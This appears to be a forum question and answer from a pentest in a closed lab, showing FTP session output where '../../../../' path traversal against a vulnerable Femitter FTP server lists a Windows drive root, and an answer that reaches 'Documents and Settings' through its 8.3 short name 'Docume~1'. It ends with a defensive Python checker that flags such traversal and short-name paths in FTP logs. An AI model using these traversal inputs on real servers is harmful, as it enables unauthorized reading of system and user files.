FTP directory traversal attack on directories containing white spaces
I am conducting a sanctioned pentest in a closed reference environment, and stumbled upon a seemingly simple issue that I currently cannot solve.
When attempting to execute a directory traversal attack against a vulnerable Femitter FTP server running on MS Windows, it is possible to do a LIST on the system root (addresses and content listings changed here for reference only):
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root):
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 0 Sep 23 2015 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 0 Sep 23 2015 CONFIG.SYS
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Sep 23 2015 Program Files
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 WINDOWS
226 File sent ok
However, if I want to list the contents of a folder containing white spaces, such as Documents and Settings, I am not able to list the directory contents because the white spaces are ignored.
ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
I already tried using different FTP clients (CLI and GUI, on Linux and Windows), and either they ignore white spaces or disallow directory traversal.
I also tried scripting the attack in Python, at first with raw sockets and then with ftplib, to send the commands in HEX format directly to the FTP server, but with no success.
Googling for a couple of hours did not yield a working solution (yes, there were a lot of options, but they did not work), which is why I hope there is someone here who has had the same issue. I am pretty sure that this is not the first time such a directory traversal with white spaces is needed.
Solution suggested by @Dogeatcatworld: use the MS Windows short directory notation, such as C:\Docume~1\.
ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 .
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 ..
drw-rw-rw- 1 ftp ftp 0 Sep 26 2015 Administrateur
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 All Users
226 File sent ok
A really good article from the MS Knowledge Base explains the 8.3 directory notation: How Windows Generates 8.3 File Names from Long File Names
The "short name" is really the old DOS 8.3 naming convention, so all the directories will be the first 6 letters followed by ~1, assuming there is only one name that matches, for example:
C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\BCDEFG~1 - C:\BCDEFGHIJKL M Another Directory
Here is the only exception:
C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\ABCDEF~2 - C:\ABCDEFGHI Directory as well
Source: How can I find the short path of a Windows directory/file?
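As an added defensive example (not code from the question, the answer, or the Femitter project), a small Python checker that runs over FTP command log lines and flags the two things this thread turns on: path arguments that climb above the FTP root with `..`, and path segments in 8.3 short-name form such as `Docume~1`. The log line format, the sample lines and the assumed root depth are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample log (assumed format): "<date> <time> <client-ip> <VERB> <argument>".
# The argument may contain spaces or be wrapped in double quotes by the client.
SAMPLE_LOG = """\
2015-09-26 10:00:01 192.168.13.22 LIST ../../../../
2015-09-26 10:00:05 192.168.13.22 LIST "../../../../documents and settings/"
2015-09-26 10:00:09 192.168.13.22 LIST ../../../../Docume~1/
2015-09-26 10:00:14 192.168.13.22 RETR reports/q3.pdf
2015-09-26 10:00:20 192.168.13.22 CWD Shared/../incoming
"""

# Assumed: the FTP root sits three levels below the drive root
# (e.g. C:\Program Files\Femitter\Shared), so 3 or more net ".." reach the drive.
ROOT_DEPTH = 3
LOG_RE = re.compile(r"^(\S+ \S+) (\S+) ([A-Z]{3,4})(?: (.*))?$")
# 8.3 short name: up to 6 characters, "~", a number, optional 3-char extension.
SHORT_NAME_RE = re.compile(r"^[^~\\/]{1,6}~\d+(\.[^.\\/]{1,3})?$")

def _segments(path: str) -> List[str]:
    return re.split(r"[\\/]+", path.strip().strip('"'))

def escape_depth(path: str) -> int:
    """Levels the path climbs above the FTP root at its deepest point (0 = stays inside)."""
    depth = min_depth = 0
    for seg in _segments(path):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        min_depth = min(min_depth, depth)
    return -min_depth

def short_name_segments(path: str) -> List[str]:
    """Path segments written in Windows 8.3 short-name form (XXXXXX~N)."""
    return [s for s in _segments(path) if SHORT_NAME_RE.match(s)]

def analyze_line(line: str) -> Dict:
    m = LOG_RE.match(line)
    if not m:
        return {}
    _ts, client, verb, arg = m.groups()
    arg = arg or ""
    esc = escape_depth(arg)
    return {"client": client, "verb": verb, "arg": arg,
            "escapes_root": esc > 0, "reaches_drive_root": esc >= ROOT_DEPTH,
            "short_names": short_name_segments(arg),
            "has_whitespace": " " in arg.strip('"')}

def suspicious_lines(log: str) -> List[Dict]:
    """Every command that leaves the FTP root or uses an 8.3 short name."""
    return [r for r in map(analyze_line, log.splitlines())
            if r and (r["escapes_root"] or r["short_names"])]
```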